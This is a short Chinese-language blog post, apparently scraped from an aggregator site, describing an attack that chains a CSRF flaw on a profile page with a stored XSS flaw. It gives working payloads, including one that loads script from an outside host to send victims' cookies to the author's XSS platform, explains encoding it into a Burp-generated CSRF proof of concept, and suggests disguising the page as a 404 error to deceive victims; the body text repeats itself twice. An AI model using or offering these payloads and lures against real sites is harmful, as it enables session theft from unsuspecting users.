一次csrf配合xss的攻击实例
2017-03-16 09:00
232 查看
xss出现在我的邮箱处
alert of payload
by cookie of payload
csrf依旧是出现在“我的资料”这里,我们进行抓包
由此我们可以从中看到并没有验证token
那么我们生成poc(burpsuite可以直接生成)
得到poc如下图:
在
打红勾的地方即为刚才存在xss漏洞的地方也是csrf漏洞的所在地。
我们将value值换成我们的xss 打cookie的 payload("><script src=http://t.cn/RxQ4lz8></script><")
此时如果我们直接将这个payload插入到value值当中定然会被当作html代码,就扰乱了poc的html代码。我们需要对其进行一个转码。我们可以采用unicode进行编码一下绕过这个问题。
当对方打开这个poc的时候cookie就自动跑到我们的xss 平台了。
我们可以将poc放到某个网站下面,然后把poc写成404,让被攻击打开误以为是错误页面。
alert of payload
"><script>alert(/test/)</script><"
by cookie of payload
"><script src=http://t.cn/RxQ4lz8></script><"
csrf依旧是出现在“我的资料”这里,我们进行抓包
由此我们可以从中看到并没有验证token
那么我们生成poc(burpsuite可以直接生成)
得到poc如下图:
在
打红勾的地方即为刚才存在xss漏洞的地方也是csrf漏洞的所在地。
我们将value值换成我们的xss 打cookie的 payload("><script src=http://t.cn/RxQ4lz8></script><")
此时如果我们直接将这个payload插入到value值当中定然会被当作html代码,就扰乱了poc的html代码。我们需要对其进行一个转码。我们可以采用unicode进行编码一下绕过这个问题。
当对方打开这个poc的时候cookie就自动跑到我们的xss 平台了。
我们可以将poc放到某个网站下面,然后把poc写成404,让被攻击打开误以为是错误页面。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- xss 攻击和 csrf 攻击浅显的理解
- 总结 XSS 与 CSRF 两种跨站攻击
- 理解和区分CSRF 攻击与XSS
- web安全、XSS、CSRF、注入攻击、文件上传漏洞
- 前端扫雷之XSS和CSRF攻击
- django学习——常见的网站攻击的三种方式:sql注入、xss、csrf
- XSS与CSRF两种跨站攻击总结
- XSS和CSRF攻击
- xss 和 csrf攻击详解
- 三种常见web攻击方式,xss、csrf和clickJacking
- XSS 与 CSRF 两种跨站攻击
- 总结 XSS 与 CSRF 两种跨站攻击
- XSS与CSRF攻击防御概念
- 总结 XSS 与 CSRF 两种跨站攻击
- xss 和 csrf攻击详解
- HTTP路由实例教程(三)—— CSRF攻击原理及其防护
- xss 和 csrf攻击详解
- 一次解决存储型xss和csrf漏洞的简单方法
- XSS CSRF 攻击
- 总结 XSS 与 CSRF 两种跨站攻击